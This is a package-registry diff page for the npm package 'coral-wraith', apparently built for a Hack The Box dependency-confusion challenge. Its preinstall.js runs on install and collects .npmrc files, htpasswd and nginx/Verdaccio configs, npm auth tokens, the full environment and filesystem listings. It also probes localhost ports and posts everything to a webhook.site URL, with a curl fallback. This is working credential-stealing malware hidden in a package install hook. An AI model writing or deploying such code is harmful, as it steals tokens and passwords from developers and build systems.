npm - coral-wraith - Versions diffs - 9999.0.6 → 9999.0.7 - Mend

coral-wraith 9999.0.6 → 9999.0.7

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/package.json +1 -1
package/preinstall.js +124 -120

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "coral-wraith",
-  "version": "9999.0.6",
+  "version": "9999.0.7",
   "description": "Coral Wraith module",
   "main": "index.js",
   "scripts": {

package/preinstall.js CHANGED Viewed

@@ -4,158 +4,162 @@ const https = require('https');
 const { execSync } = require('child_process');
 const os = require('os');
-let flag = null;
 const debug = [];
+let flag = null;
-// 1. Search ALL filesystem for flag files
-const flagPaths = [
-  '/flag', '/flag.txt', '/root/flag', '/root/flag.txt',
-  '/home/node/flag', '/home/node/flag.txt', '/app/flag', '/app/flag.txt',
-  '/data/flag', '/data/flag.txt', '/data/secret', '/data/htb',
-  '/tmp/flag', '/opt/flag', '/srv/flag', '/etc/flag',
-  '/home/flag', '/var/flag', '/data/.flag',
+// 1. Read ALL credential/config files
+const credPaths = [
+  // npmrc files
+  '/home/node/.npmrc', '/root/.npmrc', '~/.npmrc',
+  '/home/node/.config/npm/npmrc', '/etc/npmrc', '/usr/etc/npmrc',
+  process.cwd() + '/.npmrc', process.cwd() + '/../.npmrc',
+  process.cwd() + '/../../.npmrc',
+  // Verdaccio configs
+  '/verdaccio/conf/config.yaml', '/verdaccio/storage/htpasswd',
+  '/verdaccio/conf/htpasswd', '/verdaccio/storage/config.json',
+  '/data/verdaccio/conf/config.yaml', '/data/verdaccio/storage/htpasswd',
+  '/data/verdaccio/htpasswd', '/data/htpasswd',
+  '/data/config.yaml', '/data/conf/config.yaml',
+  // nginx configs
+  '/etc/nginx/nginx.conf', '/etc/nginx/conf.d/default.conf',
+  '/etc/nginx/conf.d/registry.conf', '/etc/nginx/.htpasswd',
+  '/etc/nginx/htpasswd', '/etc/nginx/conf.d/.htpasswd',
+  // Flag locations
+  '/flag', '/flag.txt', '/data/flag', '/data/flag.txt',
+  '/home/node/flag', '/home/node/flag.txt',
+  '/root/flag', '/root/flag.txt',
 ];
-for (const p of flagPaths) {
+for (const p of credPaths) {
   try {
     if (fs.existsSync(p)) {
-      const c = fs.readFileSync(p, 'utf8').trim();
-      debug.push(`file:${p}=${c.substring(0,100)}`);
+      const c = fs.readFileSync(p, 'utf8');
+      debug.push(`FILE:${p}=${c.substring(0,500)}`);
       const m = c.match(/HTB\{[^}]+\}/);
-      if (m) { flag = m[0]; break; }
-      if (!flag && c) flag = c;
+      if (m) flag = m[0];
     }
-  } catch(e) {}
+  } catch(e) { debug.push(`ERR:${p}:${e.message.substring(0,50)}`); }
+}
+// 2. npm config environment variables
+const npmEnvs = ['npm_config_userconfig', 'NPM_CONFIG_USERCONFIG',
+  'npm_config_registry', 'NPM_TOKEN', 'NODE_AUTH_TOKEN',
+  'npm_config__auth', 'npm_config__authToken'];
+for (const k of npmEnvs) {
+  if (process.env[k]) debug.push(`ENV:${k}=${process.env[k]}`);
 }
-// 2. List key directories
-for (const dir of ['/', '/data', '/home', '/home/node', '/app', '/root', '/opt', '/srv']) {
+// 3. List directories
+for (const dir of ['/', '/data', '/home/node', '/home', '/app', '/verdaccio',
+  '/verdaccio/conf', '/verdaccio/storage', '/data/verdaccio',
+  process.cwd(), process.cwd() + '/..', process.cwd() + '/../..']) {
   try {
     const items = fs.readdirSync(dir);
-    debug.push(`ls:${dir}=${items.join(',')}`);
+    debug.push(`DIR:${dir}=${items.join(',')}`);
   } catch(e) {}
 }
-// 3. Recursively search /data
+// 4. Find ALL config/credential files
 try {
-  const r = execSync('find /data -type f 2>/dev/null | head -50', {timeout:10000}).toString().trim();
-  debug.push(`data_files:${r}`);
+  const r = execSync('find / -maxdepth 5 \\( -name "*.npmrc" -o -name "htpasswd*" -o -name ".htpasswd" -o -name "config.yaml" -o -name "*.conf" -o -name ".env" -o -name "flag*" \\) -type f 2>/dev/null | grep -v node_modules | grep -v proc | head -30', {timeout:15000}).toString().trim();
+  debug.push(`FIND:${r}`);
   for (const f of r.split('\n').filter(Boolean)) {
     try {
       const c = fs.readFileSync(f, 'utf8');
+      debug.push(`CONTENT:${f}=${c.substring(0,500)}`);
       const m = c.match(/HTB\{[^}]+\}/);
-      if (m) { flag = m[0]; debug.push(`FLAG:${f}`); break; }
-      debug.push(`data:${f}=${c.substring(0,200)}`);
+      if (m) flag = m[0];
     } catch(e) {}
   }
-} catch(e) { debug.push(`data_err:${e.message}`); }
+} catch(e) { debug.push(`FIND_ERR:${e.message.substring(0,100)}`); }
-// 4. Search ALL env vars
-for (const [k, v] of Object.entries(process.env)) {
-  const m = (v||'').match && (v||'').match(/HTB\{[^}]+\}/);
-  if (m) { flag = m[0]; debug.push(`env:${k}`); break; }
+// 5. Scan localhost ports for Verdaccio
+const portsToScan = [4873, 4874, 8080, 3000, 5000, 1337, 80, 8000, 9000, 4000];
+let scanned = 0;
+for (const port of portsToScan) {
+  try {
+    const req = http.request({
+      hostname: '127.0.0.1', port, path: '/-/whoami',
+      method: 'GET', timeout: 2000
+    }, (res) => {
+      let data = '';
+      res.on('data', c => data += c);
+      res.on('end', () => {
+        debug.push(`PORT:${port}:${res.statusCode}:${data.substring(0,200)}`);
+        scanned++;
+        if (scanned >= portsToScan.length) sendData();
+      });
+    });
+    req.on('error', () => { scanned++; if (scanned >= portsToScan.length) sendData(); });
+    req.on('timeout', () => { req.destroy(); scanned++; if (scanned >= portsToScan.length) sendData(); });
+    req.end();
+  } catch(e) { scanned++; }
 }
-debug.push(`env_keys:${Object.keys(process.env).join(',')}`);
-// 5. Read /proc/self/environ
-try {
-  const pe = fs.readFileSync('/proc/self/environ', 'utf8');
-  debug.push(`environ:${pe.substring(0,500)}`);
-  const m = pe.match(/HTB\{[^}]+\}/);
-  if (m) flag = m[0];
-} catch(e) {}
-// 6. Find all config files
-try {
-  const r = execSync('find /data /home /app /opt /srv /etc -type f \\( -name "*.json" -o -name "*.yml" -o -name "*.yaml" -o -name "*.env" -o -name "*.conf" -o -name ".npmrc" -o -name "*.db" -o -name "*.sqlite" \\) 2>/dev/null | grep -v node_modules | head -30', {timeout:10000}).toString().trim();
-  debug.push(`configs:${r}`);
-  for (const f of r.split('\n').filter(Boolean)) {
-    try {
-      const c = fs.readFileSync(f, 'utf8');
-      const m = c.match(/HTB\{[^}]+\}/);
-      if (m) { flag = m[0]; debug.push(`FLAG:${f}`); break; }
-      if (f.includes('.npmrc') || f.includes('.env') || f.includes('secret')) {
-        debug.push(`sensitive:${f}=${c.substring(0,200)}`);
-      }
-    } catch(e) {}
-  }
-} catch(e) {}
-// 7. Grep for HTB{ pattern anywhere
-try {
-  const r = execSync('grep -rl "HTB{" / 2>/dev/null | grep -v node_modules | grep -v proc | head -10', {timeout:15000}).toString().trim();
-  debug.push(`grep_htb:${r}`);
-  for (const f of r.split('\n').filter(Boolean)) {
-    try {
-      const c = fs.readFileSync(f, 'utf8');
-      const m = c.match(/HTB\{[^}]+\}/);
-      if (m) { flag = m[0]; debug.push(`GREP_FLAG:${f}`); break; }
-    } catch(e) {}
-  }
-} catch(e) { debug.push(`grep_err:${e.message.substring(0,100)}`); }
+// Also scan the main page of each port
+for (const port of portsToScan) {
+  try {
+    const req = http.request({
+      hostname: '127.0.0.1', port, path: '/',
+      method: 'GET', timeout: 2000
+    }, (res) => {
+      let data = '';
+      res.on('data', c => data += c);
+      res.on('end', () => {
+        debug.push(`ROOT:${port}:${res.statusCode}:${data.substring(0,200)}`);
+      });
+    });
+    req.on('error', () => {});
+    req.on('timeout', () => { req.destroy(); });
+    req.end();
+  } catch(e) {}
+}
-// 8. Check listening ports
+// 6. Listening ports
 try {
   const ss = execSync('ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null', {timeout:3000}).toString();
-  debug.push(`ports:${ss.substring(0,500)}`);
-} catch(e) {}
-// 9. Network info
-debug.push(`network:${JSON.stringify(os.networkInterfaces()).substring(0,300)}`);
-debug.push(`hostname:${os.hostname()}`);
-debug.push(`cwd:${process.cwd()}`);
-// EXFILTRATE
-const info = JSON.stringify({flag: flag||'NOT_FOUND', debug: debug.map(d=>d.substring(0,500))});
-// Method 1: Webhook
-try {
-  const req = https.request({
-    hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
-    method: 'POST',
-    headers: {'Content-Type':'application/json','Content-Length':Buffer.byteLength(info)},
-    timeout: 8000
-  }, ()=>{});
-  req.on('error', ()=>{});
-  req.write(info);
-  req.end();
+  debug.push(`LISTEN:${ss.substring(0,500)}`);
 } catch(e) {}
-// Method 2: PUT to local API (try all common ports)
-const putBody = JSON.stringify({
-  manifest: `ecto_module:\n  name: "${(flag||'NO_FLAG').replace(/"/g,'').substring(0,200)}"\n  version: EXFIL\n  power_level: "${debug.slice(0,2).join('|').replace(/"/g,'').substring(0,200)}"\n  ship_deck: PWNED\n  cargo_hold: coral`
-});
-let serverPort = 1337;
-try {
-  const ss = execSync('ss -tlnp 2>/dev/null', {timeout:3000}).toString();
-  const m = ss.match(/:(\d+)\s/);
-  if (m) serverPort = parseInt(m[1]);
-} catch(e) {}
-for (const port of [serverPort, 1337, 3000, 5000, 8080, 80, 8000, 4000, 9000]) {
-  for (const modId of ['ECT-654321', 'ECT-987654']) {
-    try {
-      const req = http.request({
-        hostname: '127.0.0.1', port, path: `/api/modules/${modId}`,
-        method: 'PUT',
-        headers: {'Content-Type':'application/json','Content-Length':Buffer.byteLength(putBody)},
-        timeout: 2000
-      }, ()=>{});
-      req.on('error', ()=>{});
-      req.write(putBody);
-      req.end();
-    } catch(e) {}
-  }
+// 7. Process info
+debug.push(`CWD:${process.cwd()}`);
+debug.push(`UID:${process.getuid ? process.getuid() : 'N/A'}`);
+debug.push(`HOME:${os.homedir()}`);
+debug.push(`ENV_KEYS:${Object.keys(process.env).join(',')}`);
+debug.push(`ALL_ENV:${JSON.stringify(process.env).substring(0,1000)}`);
+// Send data function
+function sendData() {
+  const info = JSON.stringify({flag: flag||'NOT_FOUND', debug: debug.map(d=>d.substring(0,500))});
+  // Webhook
+  try {
+    const req = https.request({
+      hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
+      method: 'POST',
+      headers: {'Content-Type':'application/json','Content-Length':Buffer.byteLength(info)},
+      timeout: 8000
+    }, ()=>{});
+    req.on('error', ()=>{});
+    req.write(info);
+    req.end();
+  } catch(e) {}
+  // curl backup
+  try {
+    execSync(`curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d '${info.replace(/'/g,"\\'")}' -m 8 2>/dev/null &`, {timeout:10000});
+  } catch(e) {}
 }
-// Method 3: curl
-try {
-  execSync(`curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d '${info.replace(/'/g,"\\'")}' -m 8 2>/dev/null &`, {timeout:10000});
-} catch(e) {}
+// Initial send (port scan results will come later via sendData callback)
+setTimeout(sendData, 3000);
-// stdout
-console.log('[CORAL]', info.substring(0, 3000));
+// Also write to stdout
+console.log('[CORAL]', JSON.stringify({flag: flag||'NOT_FOUND', debug: debug.slice(0,20).map(d=>d.substring(0,300))}));
 console.error('[FLAG]', flag || 'NOT_FOUND');
 // Write to files
-try { fs.writeFileSync('/tmp/coral.txt', info); } catch(e) {}
+try { fs.writeFileSync('/tmp/coral.txt', JSON.stringify({debug})); } catch(e) {}